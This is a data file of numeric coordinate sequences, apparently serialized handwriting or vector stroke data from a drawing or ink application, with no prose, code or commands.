0,-1 0-1,1 1 1,0-1 0,0 0 0,-1 1 0,1-1 0,0 1 0,0-1 0,0 0 0,0 1 0,-1-1 0,1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,-8 11-32,7-12-93,0 1 0,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,1 0 1,-1 0-1,1 0 1,-1 0-1,0 0 0,1 1 1,0-1-1,-1 0 1,1 1-1,-24 47 77,15-30-62,6-14-16,0 1 0,0-1 1,1 1-1,-1 0 0,1 0 1,1 0-1,-1 0 1,0 9-1,-9 50 30,0-15 217,11 2 1281,1-51-1524,0 0 0,-1 0 0,1 0 0,0-1 1,0 1-1,0 0 0,0-1 0,-1 1 1,1-1-1,0 1 0,0-1 0,0 1 0,0-1 1,0 0-1,0 0 0,0 1 0,1-1 1,-1 0-1,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0-1 0,0 1 1,2-1-1,35-6 888,-18 0-412,24-10-122,82-20-1,-122 36-364,0 1-1,0-1 1,1 1-1,-1 0 1,0 1 0,0-1-1,0 1 1,0-1-1,0 1 1,0 0-1,0 1 1,0-1 0,0 1-1,-1-1 1,5 4-1,20 9-3,2 2-321,-29-5-1027,-18 3-1381,-7-3-2591,5-10 2247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4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85 420,'2'-36'5704,"-1"34"-5592,0 1-1,0-1 1,0 1 0,0-1-1,0 0 1,0 0 0,0 1 0,-1-1-1,1 0 1,-1 0 0,0 0-1,1 0 1,-1 1 0,0-1 0,0 0-1,0 0 1,0 0 0,-1-2-1,1 3 26,6-8 357,-5 7-360,-6 1 27,3 1 257,3 0-403,-1 1 1,1-1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1-1-1,1 0 1,-1 0 0,0 1 0,1-1 0,-1 0 0,1 1 0,-1-1 0,0 1 0,1-1-1,-1 0 1,0 1 0,0-1 0,1 1 0,-1-1 0,0 1 0,0-1 0,0 1 0,1-1-1,-1 1 1,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 2 0,0 6 253,0 1 1,0-1 0,-1 1 0,0-1-1,0 0 1,-5 14 0,4-10-102,0-1 0,0 1 1,2 0-1,-1-1 0,2 1 0,1 16 1,0 13 64,9 2-103,11 4-2339,-3-53-4901,-17 0 4110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4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 1976,'-9'6'14376,"12"-6"-14475,0 1 0,0 0 0,0-1 0,-1 1 0,1 0 0,0 0 0,-1 1 0,1-1 0,-1 0-1,4 3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39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19 420,'0'-1'15653,"0"2"-15615,11 30 250,-11 163-292,-7-185 44,12-19-1,10-26-19,28-56 8,0 20-36,-41 69 10,0 0 0,1 1-1,-1-1 1,1 0-1,0 1 1,-1-1 0,1 1-1,0 0 1,1 0 0,-1 0-1,0 0 1,1 1 0,5-3-1,6-3-56,-15 7 47,1 0 1,-1-1-1,0 1 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0 0,-1 0-1,0-1 1,1 1-1,-1 0 1,1 0-1,-1 0 1,1 1-1,-1-1 1,0 0 0,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 1 1,0-1 0,1 0-1,-1 0 1,0 1-1,1-1 1,-1 0-1,0 0 1,1 1-1,-1-1 1,0 0 0,1 1-1,-1 0 1,9 18-307,-8-18-45,-1 0-1,0 0 1,0 0-1,1 0 1,-1 0-1,1 0 1,-1 0 0,1 0-1,-1 0 1,1 0-1,0 0 1,-1 0-1,1 0 1,0 0 0,0-1-1,0 1 1,0 0-1,1 0 1,7-1-2652,2 0-141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0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33 146 856,'52'-6'4105,"-39"6"-3839,0-2 0,0 0 0,25-7 0,-27 5-32,-1 0 1,-1-1-1,1 0 0,-1 0 0,12-9 0,5-3 705,-26 16-886,1 0 0,-1 0-1,1 0 1,-1 0-1,1 1 1,-1-1-1,1 0 1,-1 0-1,0 0 1,1 0-1,-1 0 1,0 0 0,0 0-1,0 0 1,0 0-1,0 0 1,0-1-1,0 1 1,0 0-1,0 0 1,-1 0-1,1 0 1,0 0-1,-1 0 1,1 1 0,-1-3-1,-12-23 1651,11 24-1604,-1 0 0,1 1-1,-1-1 1,1 0 0,-1 1 0,1 0 0,-1-1 0,0 1-1,0 0 1,1 0 0,-1 1 0,0-1 0,0 1-1,0-1 1,0 1 0,0 0 0,0 0 0,0 0 0,-5 1-1,-3 1 95,-1 0-1,1 1 0,-21 7 1,21-4-87,0 0 0,0 1 0,1 0 1,0 0-1,-10 10 0,16-13-17,0-1-36,0 1 1,0 0-1,0 0 1,1 0 0,0 1-1,0-1 1,0 1-1,0 0 1,1 0-1,-1 0 1,1 0 0,1 0-1,-3 9 1,4-11-49,1-1 0,-1 1 1,1-1-1,0 0 0,0 1 1,0-1-1,0 0 0,0 0 0,1 0 1,-1 0-1,1 0 0,-1 0 1,1 0-1,0 0 0,0 0 1,0-1-1,0 1 0,0-1 0,0 0 1,0 1-1,0-1 0,0 0 1,1 0-1,-1 0 0,4 0 1,67 17-24,-63-16 6,21 4-1366,46 1 0,-74-7 775,0 0 1,-1-1 0,1 1 0,0-1 0,0 0 0,-1 1 0,1-1 0,-1-1 0,1 1 0,-1 0 0,5-4 0,2 0-1860,2-1-460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1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31 1104,'-2'-23'6919,"-1"21"-6638,0 1 0,0 0 1,0 0-1,0 0 0,0 0 0,0 1 1,0 0-1,-1-1 0,1 1 1,0 0-1,0 0 0,-1 1 0,1-1 1,0 1-1,0-1 0,0 1 1,0 0-1,0 0 0,0 1 0,0-1 1,-5 4-1,3-3-148,0 1 1,1 1 0,-1-1-1,1 1 1,0 0-1,0-1 1,0 2-1,1-1 1,-1 0-1,1 1 1,-4 8-1,3-5 43,-1 2-72,0 1 0,0 1 1,2-1-1,-1 1 0,1-1 1,-2 23-1,-6 33 94,5-40-45,5-25-131,0 0 0,0 0 0,0 1-1,1-1 1,-1 1 0,1-1 0,0 1 0,-1-1 0,1 1-1,0-1 1,0 1 0,1-1 0,-1 1 0,2 4 0,16 83 298,-8-42-270,-8-40-57,0 0 0,-1 0 0,0 0 0,-1 1 0,1-1 0,-2 0-1,-1 14 1,0 7 14,-8 15-49,-1-14-289,11 14 619,0-28-3474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1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64 904,'0'0'1370,"31"-18"4045,-28 14-5240,1-1 0,1 1 0,-1 1-1,1-1 1,-1 1 0,1 0 0,0 0-1,0 0 1,1 1 0,-1-1 0,0 2-1,1-1 1,-1 0 0,1 1 0,0 0-1,6 0 1,1 0-469,0 2 0,0-1 0,0 2 0,0 0 0,-1 0 0,15 5 0,-16-6-3372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2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1 1028,'0'0'4721,"-35"18"-820,14 0-2818,18-15-920,0-1-1,0 0 1,0 1-1,0-1 1,0 1-1,1 0 1,-1 0-1,1 0 1,0 0-1,-3 6 0,-22 32 1317,22-36-1297,1 0 0,-1 1 0,2 0 0,-1 0-1,1 0 1,-1 0 0,-3 11 0,-46 182 1234,51-190-1407,1-1 1,0 1 0,1-1 0,1 16 0,0-4-8,-1-18-3,0-1 1,1 1-1,-1 0 1,1-1 0,0 1-1,-1-1 1,1 1-1,0-1 1,0 1-1,0-1 1,0 0-1,0 1 1,0-1-1,0 0 1,1 0-1,-1 0 1,0 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,1-1 1,-1 1 0,1 0-1,-1-1 1,1 1-1,0-1 1,-1 0-1,4 1 1,55 3-631,-21-9-3281,-14-8-2857,-14 7 3346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0 114 280,'35'-11'4766,"-11"5"-3860,-21 6-852,0 0 0,0-1 1,0 1-1,-1-1 0,1 0 1,0 0-1,-1 0 0,1 0 0,0 0 1,-1-1-1,5-2 0,36-25 839,-42 29-855,-1-1 1,1 1-1,0-1 1,0 1-1,0-1 1,-1 1-1,1-1 0,0 1 1,0-1-1,-1 1 1,1-1-1,-1 0 1,1 0-1,0 1 0,-1-1 1,0 0-1,1 0 1,-1 0-1,1 1 1,-1-1-1,0 0 0,1 0 1,-1 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 1 0,0-1 1,0 0-1,0 0 1,0 0-1,0 0 1,-1 0-1,1 0 0,0 0 1,-1 0-1,1 1 1,0-1-1,-1 0 1,1 0-1,-1 0 0,1 1 1,-1-1-1,0 0 1,1 1-1,-1-1 1,0 0-1,1 1 0,-1-1 1,-1 0-1,0 0 43,0-1-1,0 0 0,0 1 0,0 0 0,0-1 1,-1 1-1,1 0 0,0 0 0,-1 0 1,1 0-1,-1 1 0,1-1 0,-1 1 0,1-1 1,-1 1-1,1 0 0,-4 0 0,1 2 23,1-1-1,-1 1 1,0-1-1,0 2 0,1-1 1,0 0-1,-1 1 1,1 0-1,0 0 0,0 0 1,0 0-1,1 1 1,-1 0-1,1-1 0,0 1 1,0 0-1,0 1 1,0-1-1,-3 8 0,3-1 2,-1 0 0,1 1-1,1-1 1,0 1-1,1 0 1,0 0 0,1 13-1,1-24-102,-1 1 0,0-1-1,0 0 1,1 0 0,-1 0-1,0 0 1,1 1 0,-1-1-1,1 0 1,-1 0 0,1 0-1,0 0 1,0 0 0,-1 0-1,1 0 1,0 0 0,0-1-1,0 1 1,0 0 0,0 0 0,0-1-1,0 1 1,0-1 0,0 1-1,0-1 1,1 1 0,-1-1-1,2 1 1,44 6-397,-21-4-1867,9-3-5049,-16-5 4368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3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19 360,'-23'-11'5987,"-3"4"-3565,24 7-2371,0 0 1,0 0-1,0 0 0,0 0 0,0 0 1,0 0-1,1 1 0,-1-1 1,0 1-1,0-1 0,0 1 0,0 0 1,1-1-1,-1 1 0,0 0 1,1 0-1,-1 0 0,0 1 0,1-1 1,-1 0-1,1 1 0,0-1 0,0 1 1,-1-1-1,1 1 0,-1 1 1,0 0 10,0 0 0,-1 0 0,1 0 0,-1 0 0,0-1 0,0 1 0,-6 3 0,7-5-34,0 0 0,1 0-1,-1 0 1,0 1 0,0-1 0,1 0 0,-1 1 0,1 0 0,-1-1 0,1 1-1,-1 0 1,1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0-1,1 1 1,-1-1 0,1 4 0,-1-5 20,1 1 0,0 0 1,0-1-1,0 1 0,1 0 0,-1-1 1,0 1-1,1-1 0,-1 1 0,1-1 1,-1 1-1,1-1 0,0 1 0,-1-1 0,1 1 1,0-1-1,2 2 0,1 2 110,-1-1-147,0 0 1,0 0-1,0 0 1,1 0 0,0-1-1,0 0 1,0 0-1,0 0 1,0 0 0,0 0-1,1-1 1,-1 0 0,1 0-1,0 0 1,9 2-1,17-2-282,6-2-1503,-33 0 1306,-1-1 1,1 0 0,-1-1 0,0 1-1,0 0 1,1-1 0,-1 0 0,0 0 0,0 0-1,4-3 1,5-4-2095,8-2-41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4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2 1624,'0'0'1558,"-7"-1"4030,3 1-4632,-7 57 490,1 10-808,6-54-444,2 1-1,0 0 1,-1 15-1,-8 69 202,11 71-1337,0-169 875,0 0-1,-1 0 0,1 1 1,0-1-1,-1 0 1,1 0-1,0 0 0,0 0 1,-1 0-1,1 0 1,0 0-1,-1 0 0,1 0 1,0 0-1,-1 0 1,1 0-1,0 0 0,-1 0 1,1 0-1,0 0 1,0 0-1,-1 0 0,1 0 1,0-1-1,-1 1 1,1 0-1,0 0 0,0 0 1,-1 0-1,1-1 1,0 1-1,0 0 0,0 0 1,-1-1-1,1 1 1,0 0-1,0 0 0,0-1 1,0 1-1,-1 0 1,1 0-1,0-1 0,0 1 1,0-1-1,-12-11-2933,-6-6-344,16 5 1424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4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63 192,'2'-24'8177,"1"20"-7700,1 0 0,0 1 0,0-1 0,0 1 0,0 0 1,0 0-1,1 0 0,6-3 0,-7 5-451,0 0 0,0-1 0,0 2 0,0-1 0,0 0 0,1 1 0,-1 0-1,0 0 1,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,-1 1 0,7 4 0,-2-2-65,33 18-2289,7-6-5061,-28-11 4431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6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40 708,'0'7'12882,"0"-8"-12566,-5 1 262,4-1-558,1 1 1,-1 0-1,1 0 1,0 0-1,-1 0 1,1-1-1,-1 1 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,0 0 1,-1 0 0,1 1-1,-1-1 1,1 0-1,-1 0 1,1 0-1,-1 1 1,1-1-1,0 0 1,-1 0-1,1 1 1,0-1-1,-1 0 1,1 1-1,0-1 1,-1 0-1,1 1 1,0-1-1,0 1 1,-1-1-1,1 0 1,0 1 0,0-1-1,0 1 1,-1 0-1,-3 4 62,4-4-71,-1-1 1,1 0-1,0 0 0,-1 0 1,1 1-1,-1-1 0,1 0 0,0 0 1,-1 1-1,1-1 0,0 0 0,-1 1 1,1-1-1,0 1 0,0-1 1,-1 0-1,1 1 0,0-1 0,0 1 1,0-1-1,-1 1 0,1-1 0,0 0 1,0 1-1,0-1 0,0 1 1,0-1-1,0 1 0,0-1 0,0 1 1,0-1-1,0 1 0,1 0 0,-12 34 579,0 20-401,0 10-139,0-9-43,1 40 18,-1-23-17,11-56-74,3-22-58,3-13 236,5-55 40,21-97-124,-30 162-27,0 0 0,0 1 1,0 0 0,0 0 0,1-1 0,0 2-1,0-1 1,0 0 0,1 1 0,0-1 0,1 1-1,-1 0 1,1 0 0,0 1 0,11-9 0,16-16-13,-26 24 9,0 0-1,1 0 0,-1 1 0,14-9 0,-12 8 8,-7 5-5,0-1-1,0 1 1,0 0 0,0 0-1,0 0 1,0 1-1,1-1 1,-1 0 0,0 0-1,0 0 1,1 1-1,-1-1 1,0 1 0,1-1-1,-1 1 1,0-1 0,1 1-1,-1 0 1,1 0-1,-1 0 1,0 0 0,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0 0,-1 1-1,0-1 1,1 1 0,-1-1-1,0 1 1,1-1-1,-1 1 1,0 0 0,0 0-1,0-1 1,1 1-1,-1 0 1,0 0 0,0 0-1,0 0 1,1 2 0,-1-1-5,0-1 1,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,-1 1 0,1 0 0,-1 0 0,1-1 0,-1 1 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,-1 0 0,1 0 0,-1-1 0,1 1 0,-3 3 0,-1 3-23,-1-1 1,0 0-1,0 0 1,-10 10-1,9-10-33,-1-1-269,1 0 0,0-1 0,-1 0 0,0 0 0,0-1 0,-1 0-1,1 0 1,-1-1 0,-12 4 0,13-4-621,-1-1 0,1 0 0,-1-1 0,1 0 0,-1 0 0,0 0 0,1-1 0,-1 0 0,0-1 0,-13-2 0,10 2-1168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7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37 1092,'-9'36'4717,"21"-9"-3933,-12-25-721,1 1 1,0 0 0,0 0 0,0 0 0,0-1-1,1 1 1,-1-1 0,1 1 0,-1-1-1,1 1 1,3 3 0,49 36 499,-51-40-542,0 0 1,0 0 0,0-1-1,0 1 1,0-1 0,0 0 0,0 1-1,0-1 1,0-1 0,1 1-1,-1 0 1,0-1 0,1 0-1,-1 0 1,0 0 0,1 0-1,-1 0 1,0-1 0,1 1-1,-1-1 1,0 0 0,0 0-1,1 0 1,-1-1 0,0 1 0,0-1-1,0 1 1,-1-1 0,6-4-1,1-1 50,0 0 0,-1-1 0,1 0 0,-2 0 0,1-1-1,-1 0 1,8-13 0,-14 20-19,-1 0 1,1 0-1,0 0 0,-1 1 1,1-1-1,-1 0 0,0-1 0,0 1 1,0 0-1,0 0 0,0 0 0,0 0 1,0 0-1,-1 0 0,1 0 1,-1 0-1,0 0 0,1 1 0,-1-1 1,0 0-1,-1-2 0,-4-16 357,5 19-360,1 0-1,-1-1 1,1 1 0,-1 0-1,0-1 1,0 1-1,1 0 1,-1 0 0,0 0-1,0 0 1,0 0 0,0 0-1,-1 0 1,1 0-1,0 0 1,0 0 0,0 1-1,-1-1 1,1 0 0,0 1-1,-1-1 1,1 1 0,-3-1-1,-34-7 910,29 8-885,1 0-1,-1 1 1,0 0 0,0 0-1,1 1 1,-1 0 0,1 1-1,0 0 1,-1 0 0,1 0-1,0 1 1,1 1 0,-1-1-1,1 1 1,-9 8 0,14-12-75,1 0 0,-1 1 0,0-1 0,1 1 0,-1-1 1,1 1-1,0 0 0,-1-1 0,1 1 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,1 0 0,-1 0 0,1 0 1,-1 0-1,1 1 0,0-1 0,0 0 0,0 0 0,0 0 1,0 1-1,0-1 0,1 0 0,-1 0 0,1 0 0,-1 0 1,3 4-1,-2-3 0,1-1 1,-1 0 0,1 0-1,0 1 1,0-1 0,0 0-1,0 0 1,1-1 0,-1 1-1,0 0 1,1-1 0,-1 0 0,1 1-1,0-1 1,-1 0 0,1 0-1,0 0 1,0-1 0,-1 1-1,1-1 1,0 0 0,4 1-1,157-1-57,-160 0 59,1 1 0,-1-1 0,0 1 0,0 0 0,1 1 1,-1-1-1,7 4 0,-10-4 1,1-1 1,-1 1 0,0 0-1,1-1 1,-1 1-1,1 0 1,-1 0 0,0 0-1,0 0 1,0 0-1,1 1 1,-1-1 0,0 0-1,0 0 1,-1 1 0,1-1-1,0 1 1,0-1-1,-1 1 1,2 1 0,3 5-196,-3-6-190,-8 6-124,2 4-2574,-2-1-2609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8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2 360,'0'-1'5323,"0"2"-4789,9 17 2134,7 2-1231,-13-15-1217,1 0-1,0 0 1,0 0 0,0-1 0,1 0-1,-1 0 1,7 4 0,0 3-70,0-2-62,2-4-48,-12-4-39,1 0 0,-1-1-1,1 1 1,-1 0 0,1-1-1,0 1 1,-1-1 0,1 0-1,0 1 1,-1-1 0,1 0 0,0 0-1,-1 0 1,1 0 0,-1 0-1,1-1 1,0 1 0,-1 0 0,1-1-1,0 1 1,-1-1 0,1 0-1,-1 1 1,1-1 0,1-1-1,61-34-78,-21 0 98,-27 23 18,-6 5 9,-10 8-45,0 0-1,0 0 1,0 0-1,0 0 0,0 0 1,0-1-1,0 1 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0-1 1,0 1-1,0 0 0,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,0 0 1,0-1-1,0 1 0,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 1,0 0-1,0-1 0,-1 1 1,1 0-1,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,-1 0 1,1 0-1,0 0 0,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,0 0 1,-1 0-1,1 0 0,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 1,-1 0-1,1 0 0,0 0 1,0 1-1,0-1 0,-2 0 50,-21 19 339,17-12-272,1 0 0,-1 0 0,0-1 0,-1 0 0,-10 9 0,-19 17 519,-115 141 1181,138-158-1819,1 1-1,0 0 1,-15 28 0,16-13-25,10-31-2,1 1-1,-1 0 1,1-1-1,0 1 1,-1 0 0,1-1-1,0 1 1,-1 0-1,1 0 1,0-1-1,0 1 1,0 0-1,0 0 1,-1 0-1,1-1 1,0 1-1,1 0 1,-1 0-1,0 0 1,0-1-1,0 1 1,0 0-1,0 0 1,1-1-1,-1 1 1,0 0-1,1 0 1,-1-1-1,1 1 1,-1 0-1,1-1 1,-1 1-1,1-1 1,0 2-1,0-2-118,-1 1 1,1-1-1,-1 1 0,1-1 1,0 0-1,-1 1 0,1-1 0,0 1 1,-1-1-1,1 0 0,0 0 0,0 0 1,-1 1-1,1-1 0,0 0 0,0 0 1,-1 0-1,1 0 0,0 0 0,0 0 1,-1 0-1,1 0 0,0-1 1,0 1-1,-1 0 0,1 0 0,0-1 1,0 1-1,-1 0 0,1-1 0,0 1 1,-1-1-1,1 1 0,-1-1 0,1 1 1,-1-1-1,2 0 0,10-17-5720,-1 6 2862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0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1 420,'0'0'2994,"-1"13"894,-25 14-890,10-7-1682,2-5-660,11-11-435,-1-1-1,1 1 0,0 0 1,-1 0-1,2 0 0,-1 0 1,0 1-1,-3 8 0,-26 49 1540,0 34-869,25-71-767,4-16-94,0 1 0,1 0 1,0 0-1,-1 17 1,3-24-35,1 1 1,0 0 0,0 0 0,0-1-1,0 1 1,0-1 0,1 1 0,-1-1-1,1 1 1,0-1 0,0 0 0,1 0-1,-1 0 1,0 0 0,1 0 0,4 3-1,14 0-574,0 1 1,32 17-1,-52-24 293,0 0-1,0 0 1,-1 0 0,1 0 0,0 1 0,-1-1 0,1 0-1,0 0 1,0 0 0,-1-1 0,1 1 0,0 0-1,0 0 1,-1 0 0,1 0 0,0-1 0,-1 1 0,1 0-1,0-1 1,-1 1 0,1-1 0,0 1 0,-1 0-1,1-1 1,-1 1 0,1-1 0,-1 0 0,1 1 0,-1-1-1,1 1 1,-1-2 0,1 1 141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3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43 308,'0'7'3592,"0"24"-2025,0-27-1525,0 0 0,1 0 1,0 0-1,-1-1 1,2 1-1,-1 0 0,0 0 1,1-1-1,-1 1 1,1 0-1,0-1 1,0 0-1,1 1 0,-1-1 1,1 0-1,-1 0 1,1 0-1,0-1 0,0 1 1,0-1-1,0 1 1,1-1-1,-1 0 1,1-1-1,-1 1 0,1 0 1,0-1-1,0 0 1,-1 0-1,1 0 0,0 0 1,0-1-1,0 1 1,0-1-1,0 0 1,0 0-1,0-1 0,0 1 1,0-1-1,0 0 1,0 0-1,-1 0 0,1 0 1,0-1-1,-1 0 1,1 0-1,-1 0 1,1 0-1,5-5 0,22-12 89,-28 17-105,1 1 0,-1-1-1,1 0 1,-1 0 0,0-1 0,0 1 0,0-1 0,0 1-1,0-1 1,-1 0 0,1 0 0,-1 0 0,0 0 0,3-5-1,-3 4 3,-2 3 5,1 0 0,0 0-1,-1 0 1,1 0 0,-1 1 0,1-1 0,-1 0 0,0 0 0,1 0-1,-1 0 1,0 0 0,0 0 0,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0-1,1 0 1,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0-1,-1 0 1,1 0 0,-1 1 0,-1-3 0,-6-9 712,7 10-683,1 1-1,-1 0 1,0-1 0,0 1 0,1 0-1,-1 0 1,0-1 0,0 1 0,-1 0-1,1 0 1,0 0 0,0 0 0,-2-1-1,-3-1 55,-1 0-1,1 1 1,0-1-1,-1 2 1,1-1-1,-1 0 1,0 1-1,1 0 1,-1 1-1,-13 0 0,17 0-112,0 0 0,-1 1-1,1-1 1,0 1 0,-1 0-1,1 0 1,0 0 0,0 0-1,0 0 1,0 1-1,0-1 1,0 1 0,0 0-1,1 0 1,-1 0 0,1 0-1,-1 1 1,1-1 0,0 1-1,0-1 1,0 1 0,0 0-1,-2 3 1,-5 7-164,8-12 92,0 0 0,0 0 0,0 1 1,0-1-1,0 0 0,1 0 0,-1 0 0,0 1 1,1-1-1,-1 0 0,1 1 0,-1-1 0,1 1 0,0-1 1,-1 1-1,1 1 0,-11 20-5391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33 119 280,'-1'0'211,"0"0"-1,-1 0 1,1 1 0,0-1 0,-1 0-1,1 1 1,0-1 0,-1 1 0,1-1-1,0 1 1,0-1 0,-1 1 0,1 0-1,0 0 1,0 0 0,0-1-1,0 1 1,0 0 0,0 1 0,-1 1-1,1-2-164,0 1 0,0-1-1,1 0 1,-1 1 0,0 0 0,1-1-1,-1 1 1,1-1 0,0 1-1,0 0 1,-1-1 0,1 1-1,0-1 1,0 1 0,1 0 0,-1-1-1,0 1 1,0 0 0,1-1-1,-1 1 1,1-1 0,0 1-1,-1-1 1,1 1 0,0-1-1,0 0 1,0 1 0,1 1 0,6 12 142,-8-13-182,1-1 0,-1 0 0,1 1 0,-1-1-1,1 0 1,-1 0 0,1 0 0,0 1-1,0-1 1,0 0 0,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,0-1-1,2 2 1,0 0 1,1-1 0,-1 0-1,0 0 1,1 0 0,-1 0 0,1-1-1,-1 1 1,1-1 0,-1 0-1,1 0 1,-1 0 0,1 0 0,0-1-1,-1 1 1,0-1 0,1 0-1,-1 0 1,1 0 0,-1-1 0,0 1-1,0-1 1,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,-1-1-1,3-2 1,35-31 541,-38 31-343,0 0 1,0 0-1,0 0 0,0 0 0,-1 0 1,0 0-1,0 0 0,0-1 1,-1 1-1,0 0 0,0 0 0,0-1 1,-1 1-1,1 0 0,-1 0 1,-1 0-1,1 0 0,-1 0 0,-2-5 1,-28-34 1714,31 43-1893,0 0-1,0 0 1,0 1-1,0-1 1,0 0 0,0 1-1,0-1 1,0 0 0,0 1-1,0-1 1,0 1 0,0 0-1,0-1 1,-1 1 0,1 0-1,0 0 1,0 0 0,0 0-1,-1 0 1,1 0-1,0 0 1,0 0 0,-1 0-1,1 0 1,0 1 0,0-1-1,0 0 1,0 1 0,0-1-1,-1 1 1,1 0 0,0-1-1,-1 2 1,-35 32-79,25-21 113,9-11-61,0 2 0,0-1 0,0 0 0,1 1 0,0-1 0,-1 1 0,1 0 0,0 0 0,1 0 0,-3 5 0,4-7-3,-1 0 0,0 0-1,1 0 1,-1 0 0,1 0 0,0 0-1,0 0 1,0 0 0,0 0 0,0 0 0,0 0-1,0 0 1,1 0 0,-1 1 0,1-1-1,-1 0 1,1-1 0,0 1 0,0 0 0,2 3-1,3 5-25,-6-9 25,1 0 0,-1 0 0,1 0 0,-1-1 0,1 1 1,0 0-1,-1 0 0,1-1 0,0 1 0,0 0 0,-1-1 0,1 1 0,0 0 0,0-1 0,0 0 0,0 1 1,-1-1-1,1 1 0,0-1 0,2 1 0,4 1-126,28 11-2095,-34-12 2055,-1-1-1,1 0 0,-1 1 1,1-1-1,-1 0 0,1 0 1,-1 1-1,1-1 0,0 0 1,-1 0-1,1 0 0,0 0 1,-1 0-1,1 0 0,-1 0 0,1 0 1,0 0-1,-1 0 0,1 0 1,0 0-1,-1 0 0,1-1 1,-1 1-1,1 0 0,-1 0 1,1-1-1,0 1 0,-1 0 1,1-1-1,-1 1 0,1-1 1,-1 1-1,0 0 0,1-1 1,-1 1-1,1-1 0,-1 1 1,0-1-1,1 0 0,-1 1 1,0-1-1,1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0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68 1316,'-5'22'4056,"5"-21"-4013,-1 0 0,1 1 0,-1-1 0,1 0 0,0 1 0,0-1 1,-1 0-1,1 1 0,0-1 0,0 0 0,0 1 0,1-1 0,-1 0 1,0 1-1,0-1 0,1 1 0,-1-1 0,1 0 0,-1 0 0,1 1 1,-1-1-1,2 2 0,9 33 190,-10-34-231,0 1 0,1-1 0,0 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1-1 0,0 1-1,1-1 1,-1 1 0,1-1 0,0 0 0,-1 0 0,1 0 0,4 1 0,-2-2-2,-1 0 0,1 0-1,-1-1 1,1 0 0,-1 1 0,0-1 0,1-1-1,-1 1 1,0 0 0,0-1 0,0 0-1,6-4 1,0 1 2,0-1-1,0 0 1,0-1-1,-1 0 1,11-12-1,-17 16 114,0-1-1,0 0 1,0 0-1,-1 0 1,0 0-1,1-1 1,-2 1-1,1-1 1,0 1-1,-1-1 1,0 0-1,0 1 1,0-1-1,-1 0 1,0-7-1,0 10-38,-1-1 1,1 1-1,-1 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 1,0 0-1,-1 0 0,1 0 1,-1 0-1,1 1 0,-1-1 1,0 1-1,0-1 1,1 1-1,-1-1 0,0 1 1,0 0-1,0 0 1,0 0-1,-1 0 0,1 1 1,-4-2-1,3 1-39,-1 0-1,0 0 1,1 0-1,-1 0 0,0 0 1,0 1-1,0 0 1,1 0-1,-1 0 1,0 0-1,0 1 1,0-1-1,1 1 1,-1 0-1,-5 2 1,5-1-32,-12 7 17,1 0 1,-26 21-1,37-27-29,1 0-1,-1 0 1,1 0-1,0 0 0,0 1 1,0 0-1,0 0 0,1-1 1,-1 1-1,1 1 1,0-1-1,0 0 0,1 0 1,-1 1-1,1-1 1,-1 8-1,-2 8-154,3-19 128,1 0 1,0 0-1,-1 0 1,1 0 0,0 1-1,-1-1 1,1 0-1,0 0 1,0 0 0,0 0-1,0 0 1,0 0-1,0 0 1,1 0 0,-1 1-1,0-1 1,0 0-1,1 0 1,-1 0 0,1 0-1,-1 0 1,1 0-1,0 1 1,4 7-1188,-5-8 1076,0-1 1,0 1 0,1 0 0,-1-1-1,0 1 1,1 0 0,-1-1-1,1 1 1,-1-1 0,0 1 0,1-1-1,-1 1 1,1-1 0,-1 0-1,1 1 1,0-1 0,-1 0 0,1 1-1,-1-1 1,1 0 0,0 1 0,-1-1-1,1 0 1,0 0 0,-1 0-1,1 0 1,0 0 0,-1 0 0,1 0-1,0 0 1,-1 0 0,1 0-1,0 0 1,-1 0 0,2-1 0,7 1-2052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0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49 464,'0'-48'7999,"-20"67"-6676,17-11-1161,1-1 1,0 1 0,0 0-1,1 0 1,0 0 0,0 17-1,0 4-5,0-12-159,1 0 0,1 0 0,0 0-1,8 31 1,16 37 50,-24-82-63,1 2-346,0-1 0,0 1-1,0-1 1,1 1 0,-1-1-1,1 0 1,0 0 0,5 5-1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1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1476,'-1'19'6580,"-7"17"-5663,6-28-852,0 1-1,1 0 1,0 0-1,0 0 1,1 0-1,1 1 0,1 11 1,0 10-81,-2-29 19,0 3-105,0 0 0,0 0 0,0 0 0,0 0-1,-1 0 1,0 0 0,0 0 0,-1 0-1,-2 7 1,4-11 84,0-1 0,-1 0 0,1 0 1,0 0-1,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 0 1,0 0-1,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 1,0 1-1,0-1 0,0 0 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 0 1,0 0-1,0 0 0,0 1 0,0-1 0,1 0 0,-1 0 0,0 0 0,0 1 0,0-1 1,1 0-1,-1 0 0,0 